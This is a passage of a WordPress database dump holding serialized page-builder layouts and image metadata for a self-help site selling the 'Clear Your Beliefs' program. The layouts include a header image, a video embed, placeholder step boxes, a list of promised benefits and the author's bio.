allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:4:"Test";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:3:{s:5:"title";s:0:"";s:4:"text";s:4:"Test";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:3:{s:5:"title";s:0:"";s:4:"text";s:4:"Test";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:17:"Content goes here";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:4:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:6:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}}}'),
(936, 1462, 'panels_data', 'a:3:{s:7:"widgets";a:6:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:48:"[su_box box_color="#1a2d8c"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:48:"[su_box box_color="#1a2d8c"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:48:"[su_box box_color="#1a2d8c"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:17:"Content goes here";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:4:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:6:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(938, 1463, 'panels_data', 'a:3:{s:7:"widgets";a:6:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:90:"[su_box title="Step 1" style="bubbles" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:90:"[su_box title="Step 2" style="bubbles" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:90:"[su_box title="Step 3" style="bubbles" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:17:"Content goes here";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:4:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:6:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}}}'),
(940, 1464, 'panels_data', 'a:3:{s:7:"widgets";a:7:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:592:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li></ul><p>Rediscover the source of your personal power</p>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:592:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li></ul><p>Rediscover the source of your personal power</p>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:4:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}}s:10:"grid_cells";a:7:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}}}'),
(941, 1465, 'panels_data', 'a:3:{s:7:"widgets";a:7:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:592:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li></ul><p>Rediscover the source of your personal power</p>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:592:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li></ul><p>Rediscover the source of your personal power</p>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:4:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}}s:10:"grid_cells";a:7:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}}}'),
(942, 1466, 'panels_data', 'a:3:{s:7:"widgets";a:7:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:4:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}}s:10:"grid_cells";a:7:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}}}'),
(943, 1467, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:1878:"<p>&lt;div&gt;</p><p><strong>I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies. </p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.” </p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun? </p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey. </p><p>Warmly,</p><p>&lt;/div&gt;</p>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(944, 1468, '_wp_attached_file', '2014/10/lion.jpg'),
(945, 1468, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:286;s:6:"height";i:89;s:4:"file";s:16:"2014/10/lion.jpg";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:15:"lion-150x89.jpg";s:5:"width";i:150;s:6:"height";i:89;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:15:"lion-220x89.jpg";s:5:"width";i:220;s:6:"height";i:89;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:15:"lion-170x89.jpg";s:5:"width";i:170;s:6:"height";i:89;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(947, 1470, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:168:"<p><img class="size-full wp-image-1457 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"[su_box title="Step 3" box_color="#1a2d8c" radius="8"]Box content[/su_box]";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to 